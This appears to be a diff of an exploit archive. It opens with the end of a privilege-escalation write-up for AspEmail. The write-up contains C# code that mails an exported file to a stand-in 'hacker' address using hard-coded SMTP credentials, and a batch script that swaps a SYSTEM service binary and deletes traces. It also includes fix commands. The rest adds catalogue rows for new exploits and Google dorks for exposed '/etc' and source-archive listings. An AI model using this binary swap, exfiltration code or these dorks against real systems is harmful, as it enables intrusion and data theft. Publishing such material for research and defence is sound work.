+ mail.To.Add("mail@hacker.com"); #
+ mail.Subject = "Trigger Successful!"; #
+ mail.IsBodyHtml = true; #
+ string htmlBody; #
+ htmlBody = "This server has been rebooted."; #
+ mail.Body = htmlBody; #
+ Attachment attachment; #
+ attachment = new Attachment(@"C:\Windows\Temp\Export.txt"); #
+ mail.Attachments.Add(attachment); #
+ SmtpServer.Port = 587; #
+ SmtpServer.UseDefaultCredentials = false; #
+ SmtpServer.Credentials = new System.Net.NetworkCredential("mail@deepseclab.com","p@ssw0rd123"); #
+ SmtpServer.EnableSsl = true; #
+ SmtpServer.Timeout = int.MaxValue; #
+ SmtpServer.Send(mail); #
+ #
+# #
+####################################################################################################################
+# #[Run.bat]# #
+####################################################################################################################
+# #
+ #
+ whoami > C:\Windows\Temp\Export.txt #
+ cd C:\Program Files (x86)\Persits Software\AspEmail\Bin #
+ del EmailAgent.exe & ren Null.EmailAgent.exe EmailAgent.exe #
+ cd c:\Windows\Tasks #
+ del Run.bat & del Mail.exe #
+ #
+# #
+####################################################################################################################
+# #
+ [+]Trigger Successful![+] #
+ #
+[+] C:\PenTest>systeminfo | findstr "Boot Time" #
+ System Boot Time: 13.04.2022, 07:46:06 #
+ #
+# #
+####################################################################################################################
+ #[Export.txt]# #
+####################################################################################################################
+# #
+ #
+ NT AUTHORITY\SYSTEM #
+ #
+# #
+####################################################################################################################
+# #
+# ==================================================================================================================
+# ...|||[FIX]|||... #
+# ==================================================================================================================
+# [+] C:\>Runas /profile /user:DeepSecLab\Administrator CMD [+] #
+# =================================================================================================================#
+
+[+] C:\Administrator>sc qc "Persits Software EmailAgent"
+ [SC] QueryServiceConfig SUCCESS
+
+ SERVICE_Name: Persits Software EmailAgent
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_Name : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgent.exe" /run
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_Name : Persits Software EmailAgent
+ DEPENDENCIES : rpcss
+ SERVICE_START_Name : LocalSystem
+
+# ==================================================================================================================
+
+[+] C:\Administrator>sc sdshow "Persits Software EmailAgent"
+
+ D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
+
+# ==================================================================================================================
+
+[+] C:\Administrator>accesschk64.exe -wuvc "Persits Software EmailAgent" -accepteula
+
+ Accesschk v6.15 - Reports effective permissions for securable objects
+ Copyright (C) 2006-2022 Mark Russinovich
+ Sysinternals - www.sysinternals.com
+
+ Persits Software EmailAgent
+ Medium Mandatory Level (Default) [No-Write-Up]
+ RW NT AUTHORITY\SYSTEM
+ SERVICE_ALL_ACCESS
+ RW BUILTIN\Administrators
+ SERVICE_ALL_ACCESS
+
+# ==================================================================================================================
+
+[+] C:\Administrator>ICACLS "C:\Program Files (x86)\Persits Software" /T /Q /C /RESET
+
+[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"
+
+ Successfully processed 0 files; Failed processing 1 files
+ C:\Program Files (x86)\Persits Software\AspEmail\Bin: Access is denied.
+
+ DONE!
+
+# ==================================================================================================================
+
+[+] C:\Administrator>sc stop "Persits Software EmailAgent"
+
+[+] PS C:\Administrator> Start-Service -Name "Persits Software EmailAgent"
+
+* These commands are optional. Used to stop the "Persits Software EmailAgent" service. We fixed the vulnerability and I don't think it's necessary anymore.
+
+# ==================================================================================================================
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 3ff01acf6..7f9f52a8a 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -3592,6 +3592,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
38437,exploits/hardware/remote/38437.txt,"Foscam IP (Multiple Cameras) - Multiple Cross-Site Request Forgery Vulnerabilities",2013-04-09,shekyan,remote,hardware,,2013-04-09,2015-10-10,1,,,,,,https://www.securityfocus.com/bid/58943/info
39195,exploits/hardware/remote/39195.c,"Foscam IP Camera - Predictable Credentials Security Bypass",2014-05-08,"Sergey Shekyan",remote,hardware,,2014-05-08,2016-01-08,1,CVE-2014-1849;OSVDB-106777,,,,,https://www.securityfocus.com/bid/67510/info
51321,exploits/hardware/remote/51321.txt,"Franklin Fueling Systems TS-550 - Exploit and Default Password",2023-04-07,"Parsa Rezaie Khiabanloo",remote,hardware,,2023-04-07,2023-04-07,0,,,,,,
+51382,exploits/hardware/remote/51382.txt,"Franklin Fueling Systems TS-550 - Default Password",2023-04-20,"Parsa Rezaie Khiabanloo",remote,hardware,,2023-04-20,2023-04-20,0,,,,,,
49293,exploits/hardware/remote/49293.txt,"FRITZ!Box 7.20 - DNS Rebinding Protection Bypass",2020-12-18,"RedTeam Pentesting GmbH",remote,hardware,,2020-12-18,2020-12-18,0,CVE-2020-26887,,,,,
32753,exploits/hardware/remote/32753.rb,"Fritz!Box Webcm - Command Injection (Metasploit)",2014-04-08,Metasploit,remote,hardware,,2014-04-08,2014-04-08,1,OSVDB-103289,"Metasploit Framework (MSF)",,,,
4744,exploits/hardware/remote/4744.txt,"FS4104-AW VDSL Device (Rooter) - GoAhead WebServer Disclosure",2007-12-18,NeoCoderz,remote,hardware,,2007-12-17,2018-01-25,1,OSVDB-43168;CVE-2007-6702,,,,,
@@ -5605,6 +5606,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
43849,exploits/json/webapps/43849.txt,"Shopware 5.2.5/5.3 - Cross-Site Scripting",2018-01-21,Vulnerability-Lab,webapps,json,,2018-01-21,2018-01-21,0,CVE-2017-15374,,,,,
42332,exploits/json/webapps/42332.rb,"Sophos Web Appliance 4.3.0.2 - 'trafficType' Remote Command Injection (Metasploit)",2017-07-18,xort,webapps,json,,2017-07-18,2017-07-18,1,CVE-2017-6182,,,,,
42111,exploits/json/webapps/42111.txt,"Sungard eTRAKiT3 <= 3.2.1.17 - SQL Injection",2017-06-02,"Goran Tuzovic",webapps,json,,2017-06-02,2017-08-18,0,CVE-2016-6566,,,,,
+51379,exploits/json/webapps/51379.txt,"Swagger UI 4.1.3 - User Interface (UI) Misrepresentation of Critical Information",2023-04-20,"Rafael Cintra Lopes",webapps,json,,2023-04-20,2023-04-20,0,,,,,,
39488,exploits/json/webapps/39488.txt,"Ubiquiti Networks UniFi 3.2.10 - Cross-Site Request Forgery",2016-02-23,"Julien Ahrens",webapps,json,8443,2016-02-23,2016-02-23,0,,,,,,
40030,exploits/json/webapps/40030.py,"Untangle NGFW 12.1.0 Beta - 'execEvil()' Command Injection",2016-06-28,"Matt Bush",webapps,json,80,2016-06-28,2016-06-28,0,,,,,,
48002,exploits/json/webapps/48002.py,"Verodin Director Web Console 3.5.4.0 - Remote Authenticated Password Disclosure (PoC)",2020-02-05,nxkennedy,webapps,json,,2020-02-05,2020-02-05,0,CVE-2019-10716,,,,,
@@ -7293,6 +7295,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
41994,exploits/linux/local/41994.c,"Linux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Local Privilege Escalation",2017-05-11,"Andrey Konovalov",local,linux,,2017-05-11,2019-07-26,1,CVE-2017-7308,Local,,,,https://github.com/xairy/kernel-exploits/blob/44fcbaafcb2988d3cbfee5d417b17368e15c78bf/CVE-2017-7308/poc.c
50541,exploits/linux/local/50541.c,"Linux Kernel 5.1.x - 'PTRACE_TRACEME' pkexec Local Privilege Escalation (2)",2021-11-23,"Ujas Dhami",local,linux,,2021-11-23,2021-11-23,0,CVE-2019-13272,,,,,
50808,exploits/linux/local/50808.c,"Linux Kernel 5.8 < 5.16.11 - Local Privilege Escalation (DirtyPipe)",2022-03-08,"Lance Biggerstaff",local,linux,,2022-03-08,2022-03-08,0,CVE-2022-0847,,,,,
+51384,exploits/linux/local/51384.txt,"Linux Kernel 6.2 - Userspace Processes To Enable Mitigation",2023-04-20,nu11secur1ty,local,linux,,2023-04-20,2023-04-20,0,CVE-2023-1998,,,,,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,,2003-04-13,2016-02-25,1,OSVDB-4565;CVE-2003-0127,,,,http://www.exploit-db.comlinux-2.4.19.tar.gz,
4756,exploits/linux/local/4756.c,"Linux Kernel < 2.6.11.5 - BlueTooth Stack Privilege Escalation",2007-12-18,Backdoored,local,linux,,2007-12-17,2016-11-08,1,,,,,http://www.exploit-db.comlinux-2.6.11.1.tar.gz,
9363,exploits/linux/local/9363.c,"Linux Kernel < 2.6.14.6 - 'procfs' Kernel Memory Disclosure",2009-08-05,"Jon Oberheide",local,linux,,2009-08-04,,1,CVE-2005-4605;OSVDB-22212,,,,,
@@ -10993,6 +10996,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
19492,exploits/multiple/remote/19492.txt,"Microsoft Internet Explorer 5 / Netscape Communicator 4.0/4.5/4.6 - JavaScript STYLE",1999-09-13,"Georgi Guninski",remote,multiple,,1999-09-13,2012-06-30,1,CVE-1999-0750,,,,,https://www.securityfocus.com/bid/630/info
24189,exploits/multiple/remote/24189.html,"Microsoft Internet Explorer 5.0.1 / Opera 7.51 - URI Obfuscation",2004-06-10,http-equiv,remote,multiple,,2004-06-10,2013-01-17,1,,,,,,https://www.securityfocus.com/bid/10517/info
19451,exploits/multiple/remote/19451.txt,"Microsoft Windows 98a/98b/98SE / Solaris 2.6 - IRDP",1999-08-11,L0pth,remote,multiple,,1999-08-11,2012-06-28,1,CVE-1999-0875;OSVDB-1039,,,,,https://www.securityfocus.com/bid/578/info
+51376,exploits/multiple/remote/51376.txt,"Microsoft Word 16.72.23040900 - Remote Code Execution (RCE)",2023-04-20,nu11secur1ty,remote,multiple,,2023-04-20,2023-04-20,0,CVE-2023-28311,,,,,
20425,exploits/multiple/remote/20425.pl,"Microsys CyberPatrol 4.0 4.003/4.0 4.005 - Insecure Registration",2000-11-22,"Joey Maier",remote,multiple,,2000-11-22,2012-08-11,1,CVE-2000-1173;OSVDB-11344,,,,,https://www.securityfocus.com/bid/1977/info
12114,exploits/multiple/remote/12114.txt,"miniature java Web server 1.71 - Multiple Vulnerabilities",2010-04-08,cp77fk4r,remote,multiple,,2010-04-07,,1,OSVDB-63877;OSVDB-63876;OSVDB-63875;OSVDB-63874,,,,http://www.exploit-db.comWebServer-171.zip,
36839,exploits/multiple/remote/36839.py,"MiniUPnPd 1.0 (MIPS) - Remote Stack Overflow Remote Code Execution for AirTies RT Series",2015-04-27,"Onur Alanbel (BGA)",remote,multiple,,2015-04-27,2018-11-15,0,CVE-2013-0230;OSVDB-89624,,,,http://www.exploit-db.comminiupnpd-1.0.tar.gz,
@@ -14431,6 +14435,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
28307,exploits/php/webapps/28307.txt,"Banex PHP MySQL Banner Exchange 2.21 - 'admin.php' Multiple SQL Injections",2006-07-31,SirDarckCat,webapps,php,,2006-07-31,2013-09-15,1,CVE-2006-3963;OSVDB-29090,,,,,https://www.securityfocus.com/bid/19240/info
28308,exploits/php/webapps/28308.txt,"Banex PHP MySQL Banner Exchange 2.21 - 'members.php?cfg_root' Remote File Inclusion",2006-07-31,SirDarckCat,webapps,php,,2006-07-31,2013-09-15,1,CVE-2006-3964;OSVDB-29091,,,,,https://www.securityfocus.com/bid/19240/info
28306,exploits/php/webapps/28306.txt,"Banex PHP MySQL Banner Exchange 2.21 - 'signup.php?site_name' SQL Injection",2006-07-31,SirDarckCat,webapps,php,,2006-07-31,2013-09-15,1,CVE-2006-3963;OSVDB-29089,,,,,https://www.securityfocus.com/bid/19240/info
+51378,exploits/php/webapps/51378.txt,"Bang Resto v1.0 - 'Multiple' SQL Injection",2023-04-20,"Rahad Chowdhury",webapps,php,,2023-04-20,2023-04-20,0,CVE-2023-29849,,,,,
+51377,exploits/php/webapps/51377.txt,"Bang Resto v1.0 - Stored Cross-Site Scripting (XSS)",2023-04-20,"Rahad Chowdhury",webapps,php,,2023-04-20,2023-04-20,0,CVE-2023-29848,,,,,
51175,exploits/php/webapps/51175.txt,"Bangresto 1.0 - SQL Injection",2023-03-31,nu11secur1ty,webapps,php,,2023-03-31,2023-03-31,0,,,,,,
41989,exploits/php/webapps/41989.txt,"BanManager WebUI 1.5.8 - PHP Code Injection",2017-05-10,HaHwul,webapps,php,,2017-05-10,2017-05-10,0,,,,,http://www.exploit-db.comBanManager-WebUI-1.5.8.zip,
17107,exploits/php/webapps/17107.txt,"Banner Ad Management Script - SQL Injection",2011-04-03,Egyptian.H4x0rz,webapps,php,,2011-04-03,2011-04-03,1,,,,,,
@@ -15467,6 +15473,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
33967,exploits/php/webapps/33967.txt,"Chipmunk NewsLetter 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-20,b0telh0,webapps,php,,2010-01-20,2014-07-05,1,,,,,,https://www.securityfocus.com/bid/40024/info
15223,exploits/php/webapps/15223.txt,"Chipmunk Pwngame - Multiple SQL Injections",2010-10-09,KnocKout,webapps,php,,2010-10-09,2010-10-09,1,OSVDB-68620;CVE-2010-4799,,,,http://www.exploit-db.compwngame.zip,
7227,exploits/php/webapps/7227.txt,"chipmunk topsites - Authentication Bypass / Cross-Site Scripting",2008-11-25,ZoRLu,webapps,php,,2008-11-24,,1,OSVDB-57377;CVE-2008-7072;OSVDB-50345;CVE-2008-7071,,,,,
+51383,exploits/php/webapps/51383.py,"Chitor-CMS v1.1.2 - Pre-Auth SQL Injection",2023-04-20,msd0pe,webapps,php,,2023-04-20,2023-04-20,0,,,,,,
31390,exploits/php/webapps/31390.txt,"Chris LaPointe Download Center 1.2 - 'category' Cross-Site Scripting",2008-03-12,ZoRLu,webapps,php,,2008-03-12,2014-02-04,1,CVE-2008-7134;OSVDB-57649,,,,,https://www.securityfocus.com/bid/28219/info
31391,exploits/php/webapps/31391.txt,"Chris LaPointe Download Center 1.2 - 'search' Cross-Site Scripting",2008-03-12,ZoRLu,webapps,php,,2008-03-12,2014-02-04,1,CVE-2008-7134;OSVDB-57650,,,,,https://www.securityfocus.com/bid/28219/info
31389,exploits/php/webapps/31389.txt,"Chris LaPointe Download Center 1.2 - login Action Multiple Cross-Site Scripting Vulnerabilities",2008-03-12,ZoRLu,webapps,php,,2008-03-12,2014-02-04,1,CVE-2008-7134;OSVDB-57648,,,,,https://www.securityfocus.com/bid/28219/info
@@ -18855,6 +18862,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
1595,exploits/php/webapps/1595.php,"gCards 1.45 - Multiple Vulnerabilities",2006-03-20,rgod,webapps,php,,2006-03-19,,1,OSVDB-24018;CVE-2006-1348;OSVDB-24017;CVE-2006-1347;OSVDB-24016;CVE-2006-1346,,,,,
3988,exploits/php/webapps/3988.php,"gCards 1.46 - SQL Injection / Remote Code Execution",2007-05-25,Silentz,webapps,php,,2007-05-24,,1,OSVDB-36317;CVE-2007-2971,,,,,
11316,exploits/php/webapps/11316.txt,"GCP 2.0 datasets provided as BioCASE Web services - Local File Inclusion",2010-02-02,R3VAN_BASTARD,webapps,php,,2010-02-01,,1,,,,,,
+51381,exploits/php/webapps/51381.txt,"GDidees CMS 3.9.1 - Local File Disclosure",2023-04-20,"Hadi Mene",webapps,php,,2023-04-20,2023-04-20,0,CVE-2023-27179,,,,,
31961,exploits/php/webapps/31961.txt,"GDL 4.2 - Multiple Vulnerabilities",2014-02-27,ByEge,webapps,php,80,2014-02-27,2014-02-27,0,OSVDB-104011;OSVDB-104010;OSVDB-104009;OSVDB-104008;OSVDB-104007;CVE-2014-100031;CVE-2014-100030;CVE-2014-100029,,,,http://www.exploit-db.comgdl42.zip,
8228,exploits/php/webapps/8228.txt,"GDL 4.x - 'node' SQL Injection",2009-03-17,g4t3w4y,webapps,php,,2009-03-16,,1,OSVDB-52803;CVE-2009-0965,,,,,
3522,exploits/php/webapps/3522.pl,"GeBlog 0.1 (Windows) - GLOBALS[tplname] Local File Inclusion",2007-03-20,GoLd_M,webapps,php,,2007-03-19,2016-09-27,1,OSVDB-33776;CVE-2007-1577,,,,http://www.exploit-db.comgeblog-0.1.tar.gz,
@@ -22297,6 +22305,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
3275,exploits/php/webapps/3275.txt,"LightRO CMS 1.0 - 'inhalt.php' Remote File Inclusion",2007-02-06,ajann,webapps,php,,2007-02-05,,1,OSVDB-34599;CVE-2007-0824,,,,,
50064,exploits/php/webapps/50064.rb,"Lightweight facebook-styled blog 1.3 - Remote Code Execution (RCE) (Authenticated) (Metasploit)",2021-06-25,"Maide Ilkay Aydogdu",webapps,php,,2021-06-25,2021-06-25,1,,,,,http://www.exploit-db.comblog-1.3.zip,
5873,exploits/php/webapps/5873.txt,"Lightweight news portal (LNP) 1.0b - Multiple Vulnerabilities",2008-06-20,storm,webapps,php,,2008-06-19,2016-12-08,1,OSVDB-57817;CVE-2008-7172;OSVDB-57816;CVE-2008-7171;OSVDB-57815;OSVDB-57814,,,,,
+51374,exploits/php/webapps/51374.py,"Lilac-Reloaded for Nagios 2.0.8 - Remote Code Execution (RCE)",2023-04-20,"max / Zoltan Padanyi",webapps,php,,2023-04-20,2023-04-20,0,,,,,,
14443,exploits/php/webapps/14443.txt,"LILDBI - Arbitrary File Upload",2010-07-23,EraGoN,webapps,php,,2010-07-23,2010-07-23,0,,,,,,
1373,exploits/php/webapps/1373.php,"Limbo 1.0.4.2 - '_SERVER[REMOTE_ADDR]' Remote Command Execution",2005-12-14,rgod,webapps,php,,2005-12-13,2017-11-22,1,OSVDB-21753;CVE-2005-4318,,,,,
6796,exploits/php/webapps/6796.txt,"Limbo CMS - Private Messaging Component SQL Injection",2008-10-21,StAkeR,webapps,php,,2008-10-20,,1,OSVDB-51863;CVE-2008-6078,,,,,
@@ -27481,6 +27490,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
37146,exploits/php/webapps/37146.txt,"PivotX 2.3.2 - 'ajaxhelper.php' Cross-Site Scripting",2012-05-09,"High-Tech Bridge SA",webapps,php,,2012-05-09,2015-05-29,1,CVE-2012-2274;OSVDB-81747,,,,,https://www.securityfocus.com/bid/53434/info
38881,exploits/php/webapps/38881.html,"Piwigo - 'admin.php' Cross-Site Request Forgery (User Creation)",2013-12-17,sajith,webapps,php,,2013-12-17,2015-12-06,1,OSVDB-101409,,,,,https://www.securityfocus.com/bid/64357/info
49818,exploits/php/webapps/49818.py,"Piwigo 11.3.0 - 'language' SQL",2021-05-03,nu11secur1ty,webapps,php,,2021-05-03,2021-05-03,0,CVE-2021-27973,,,,http://www.exploit-db.comPiwigo-11.3.0.zip,
+51386,exploits/php/webapps/51386.txt,"Piwigo 13.6.0 - Stored Cross-Site Scripting (XSS)",2023-04-20,"Mirabbas Ağalarov",webapps,php,,2023-04-20,2023-04-20,0,,,,,,
34367,exploits/php/webapps/34367.txt,"Piwigo 2.0 - 'comments.php' Multiple Cross-Site Scripting Vulnerabilities",2009-10-28,"Andrew Paterson",webapps,php,,2009-10-28,2014-08-19,1,CVE-2009-4039;OSVDB-59955,,,,,https://www.securityfocus.com/bid/41897/info
10417,exploits/php/webapps/10417.txt,"Piwigo 2.0.6 - Multiple Vulnerabilities",2009-12-13,mr_me,webapps,php,,2009-12-12,,1,OSVDB-60977,,,,http://www.exploit-db.compiwigo-2.0.6.zip,
48814,exploits/php/webapps/48814.txt,"Piwigo 2.10.1 - Cross Site Scripting",2020-09-16,Iridium,webapps,php,,2020-09-16,2020-09-16,0,CVE-2020-9467,,,,,
@@ -28028,6 +28038,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
41433,exploits/php/webapps/41433.txt,"ProjectSend r754 - Insecure Direct Object Reference",2017-02-21,Vulnerability-Lab,webapps,php,,2017-02-22,2017-02-22,0,,,,,http://www.exploit-db.comProjectSend-r754.zip,https://www.vulnerability-lab.com/get_content.php?id=2031
15773,exploits/php/webapps/15773.txt,"Projekt Shop - 'details.php' Multiple SQL Injections",2010-12-18,"DeadLy DeMon",webapps,php,,2010-12-18,2010-12-18,1,OSVDB-75934;CVE-2010-4845;OSVDB-69953,,,,,
49919,exploits/php/webapps/49919.txt,"ProjeQtOr Project Management 9.1.4 - Remote Code Execution",2021-06-01,"Temel Demir",webapps,php,,2021-06-01,2021-06-01,0,,,,,,
+51387,exploits/php/webapps/51387.txt,"ProjeQtOr Project Management System 10.3.2 - Remote Code Execution (RCE)",2023-04-20,"Mirabbas Ağalarov",webapps,php,,2023-04-20,2023-04-20,0,,,,,,
45680,exploits/php/webapps/45680.txt,"ProjeQtOr Project Management Tool 7.2.5 - Remote Code Execution",2018-10-25,AkkuS,webapps,php,,2018-10-25,2018-11-06,0,CVE-2018-18924,,,,http://www.exploit-db.comprojeqtorV7.2.5.zip,
50641,exploits/php/webapps/50641.txt,"Projeqtor v9.3.1 - Stored Cross Site Scripting (XSS)",2022-01-05,"Oscar Gil Gutierrez",webapps,php,,2022-01-05,2022-01-05,0,,,,,,
11587,exploits/php/webapps/11587.txt,"ProMan 0.1.1 - Multiple File Inclusions",2010-02-27,cr4wl3r,webapps,php,,2010-02-26,,1,OSVDB-65128;CVE-2010-2138;OSVDB-65127;OSVDB-65126;OSVDB-65125;OSVDB-65124;OSVDB-65123;OSVDB-65122;OSVDB-65121;CVE-2010-2137,,,,http://www.exploit-db.comProMan_v.0.1.1.zip,
@@ -29045,6 +29056,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
46190,exploits/php/webapps/46190.txt,"SeoToaster Ecommerce / CRM / CMS 3.0.0 - Local File Inclusion",2019-01-18,"Ihsan Sencan",webapps,php,80,2019-01-18,2019-01-18,0,,"File Inclusion (LFI/RFI)",,,http://www.exploit-db.comseotoasterv3.0.0.zip,
5960,exploits/php/webapps/5960.txt,"SePortal 2.4 - 'poll_id' SQL Injection",2008-06-27,Mr.SQL,webapps,php,,2008-06-26,2016-12-09,1,OSVDB-46567;CVE-2008-5191;OSVDB-46566,,,,,
18222,exploits/php/webapps/18222.txt,"SePortal 2.5 - SQL Injection (1)",2011-12-09,Don,webapps,php,,2011-12-09,2016-12-14,0,OSVDB-77591,,,,http://www.exploit-db.comseportal2.5.zip,
+51373,exploits/php/webapps/51373.txt,"Serendipity 2.4.0 - Cross-Site Scripting (XSS)",2023-04-20,"Mirabbas Ağalarov",webapps,php,,2023-04-20,2023-04-20,0,,,,,,
+51372,exploits/php/webapps/51372.txt,"Serendipity 2.4.0 - Remote Code Execution (RCE) (Authenticated)",2023-04-20,"Mirabbas Ağalarov",webapps,php,,2023-04-20,2023-04-20,0,,,,,,
35197,exploits/php/webapps/35197.txt,"Serenity Client Management Portal 1.0.1 - Multiple Vulnerabilities",2014-11-10,"Halil Dalabasmaz",webapps,php,,2014-11-12,2014-11-12,0,OSVDB-114661;OSVDB-114660,,,,,
45817,exploits/php/webapps/45817.txt,"ServerZilla 1.0 - 'email' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,80,2018-11-12,2018-11-13,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comServerZilla_src.zip,
10938,exploits/php/webapps/10938.txt,"Service d'upload 1.0.0 - Arbitrary File Upload",2010-01-03,indoushka,webapps,php,,2010-01-02,,0,,,,,,
@@ -34708,6 +34721,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
4032,exploits/tru64/remote/4032.pl,"HP Tru64 - Remote Secure Shell User Enumeration",2007-06-04,bunker,remote,tru64,,2007-06-03,,1,OSVDB-36204;CVE-2007-2791,,,,,
50008,exploits/tru64/webapps/50008.txt,"Client Management System 1.1 - 'Search' SQL Injection",2021-06-15,"BHAVESH KAUL",webapps,tru64,,2021-06-15,2021-06-15,0,,,,,,
51354,exploits/typescript/webapps/51354.txt,"ever gauzy v0.281.9 - JWT weak HMAC secret",2023-04-10,nu11secur1ty,webapps,typescript,,2023-04-10,2023-04-10,0,,,,,,
+51385,exploits/typescript/webapps/51385.txt,"FUXA V.1.1.13-1186 - Unauthenticated Remote Code Execution (RCE)",2023-04-20,"Rodolfo Mariano",webapps,typescript,,2023-04-20,2023-04-20,0,,,,,,
51073,exploits/typescript/webapps/51073.txt,"Grafana <=6.2.4 - HTML Injection",2023-03-27,"SimranJeet Singh",webapps,typescript,,2023-03-27,2023-03-27,0,CVE-2019-13068,,,,,
19817,exploits/ultrix/dos/19817.txt,"Data General DG/UX 5.4 - inetd Service Exhaustion Denial of Service",2000-03-16,"The Unicorn",dos,ultrix,,2000-03-16,2012-07-14,1,OSVDB-83869,,,,,https://www.securityfocus.com/bid/1071/info
698,exploits/ultrix/local/698.c,"Ultrix 4.5/MIPS - dxterm 0 Local Buffer Overflow",2004-12-20,"Kristoffer Brånemyr",local,ultrix,,2004-12-19,,1,OSVDB-12626;CVE-2004-1326,,,,,
@@ -39153,6 +39167,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
41031,exploits/windows/local/41031.txt,"aSc Timetables 2017 - Local Buffer Overflow",2017-01-12,"Peter Baris",local,windows,,2017-01-12,2017-01-12,0,,,,,http://www.exploit-db.comaScTimeTables.exe,
49147,exploits/windows/local/49147.txt,"aSc TimeTables 2021.6.2 - Denial of Service (PoC)",2020-12-02,"Ismael Nava",local,windows,,2020-12-02,2020-12-02,0,,,,,,
40520,exploits/windows/local/40520.txt,"ASLDRService ATK Hotkey 1.0.69.0 - Unquoted Service Path Privilege Escalation",2016-10-13,"Cyril Vallicari",local,windows,,2016-10-13,2016-10-13,0,,,,,,
+51380,exploits/windows/local/51380.txt,"AspEmail v5.6.0.2 - Local Privilege Escalation",2023-04-20,Zer0FauLT,local,windows,,2023-04-20,2023-04-20,0,,,,,,
31460,exploits/windows/local/31460.txt,"Asseco SEE iBank FX Client 2.0.9.3 - Local Privilege Escalation",2014-02-06,LiquidWorm,local,windows,,2014-02-06,2014-02-06,0,OSVDB-103048,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5168.php
16675,exploits/windows/local/16675.rb,"AstonSoft DeepBurner - '.dbr' Path Buffer Overflow (Metasploit)",2010-09-20,Metasploit,local,windows,,2010-09-20,2011-03-10,1,CVE-2006-6665;OSVDB-32356,"Metasploit Framework (MSF)",,,,
2950,exploits/windows/local/2950.c,"AstonSoft DeepBurner 1.8.0 - '.dbr' File Parsing Buffer Overflow",2006-12-19,Expanders,local,windows,,2006-12-18,2016-10-27,1,OSVDB-32356;CVE-2006-6665,,,,,
@@ -39710,6 +39725,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
16640,exploits/windows/local/16640.rb,"feedDemon 3.1.0.12 - Local Stack Buffer Overflow (Metasploit)",2010-11-11,Metasploit,local,windows,,2010-11-11,2011-03-10,1,CVE-2009-0546;OSVDB-51753,"Metasploit Framework (MSF)",,,,
11379,exploits/windows/local/11379.c,"feedDemon 3.1.0.9 - '.opml' File Buffer Overflow",2010-02-09,"fl0 fl0w",local,windows,,2010-02-08,,1,OSVDB-51753;CVE-2009-0546,,,,http://www.exploit-db.comFeedDemonInstall.exe,
14046,exploits/windows/local/14046.py,"FieldNotes 32 5.0 - Local Buffer Overflow (SEH)",2010-06-25,TecR0c,local,windows,,2010-06-25,2010-11-12,1,,,,,,http://www.corelan.be:8866/advisories.php?id=CORELAN-10-053
+51375,exploits/windows/local/51375.txt,"File Replication Pro 7.5.0 - Privilege Escalation/Password reset due Incorrect Access Control",2023-04-20,"Andrea Intilangelo",local,windows,,2023-04-20,2023-04-20,0,CVE-2023-26918,,,,,
50763,exploits/windows/local/50763.txt,"File Sanitizer for HP ProtectTools 5.0.1.3 - 'HPFSService' Unquoted Service Path",2022-02-18,SamAlucard,local,windows,,2022-02-18,2022-02-18,0,,,,,,
21892,exploits/windows/local/21892.txt,"FileBound 6.2 - Local Privilege Escalation",2012-10-11,"Nathaniel Carew",local,windows,,2012-10-11,2012-10-11,0,OSVDB-86254,,,,,http://www.senseofsecurity.com.au/advisories/SOS-12-010.pdf
35077,exploits/windows/local/35077.txt,"Filemaker Pro 13.03 / Advanced 12.04 - Authentication Bypass / Privilege Escalation",2014-10-27,"Giuseppe D'Amore",local,windows,,2014-10-28,2014-10-28,0,CVE-2014-8347;OSVDB-113845,,,,,
diff --git a/ghdb.xml b/ghdb.xml
index 946f6bcdb..697dfd861 100644
--- a/ghdb.xml
+++ b/ghdb.xml
@@ -37610,6 +37610,21 @@ stag_1
2021-07-21
Osman Arif
+
+ 8162
+ https://www.exploit-db.com/ghdb/8162
+ Files Containing Juicy Info
+ Index of" intext:"source_code.zip
+ # Google Dork: Index of" intext:"source_code.zip
+# Files Containing Juicy Info
+# Date:20/04/2023
+# Exploit Author: PARAG BAGUL
+ Index of" intext:"source_code.zip
+ https://www.google.com/search?q=Index of" intext:"source_code.zip
+
+ 2023-04-20
+ PARAG BAGUL
+
7638
https://www.exploit-db.com/ghdb/7638
@@ -38679,6 +38694,66 @@ misconfigured servers.
2023-04-06
Monirul Islam
+
+ 8166
+ https://www.exploit-db.com/ghdb/8166
+ Files Containing Juicy Info
+ intext:"Index of" intext:"/etc"
+ # Google Dork: intext:"Index of" intext:"/etc"
+# Files Containing Juicy Info
+# Date:20/04/2023
+# Exploit Author: PARAG BAGUL
+ intext:"Index of" intext:"/etc"
+ https://www.google.com/search?q=intext:"Index of" intext:"/etc"
+
+ 2023-04-20
+ PARAG BAGUL
+
+
+ 8163
+ https://www.exploit-db.com/ghdb/8163
+ Files Containing Juicy Info
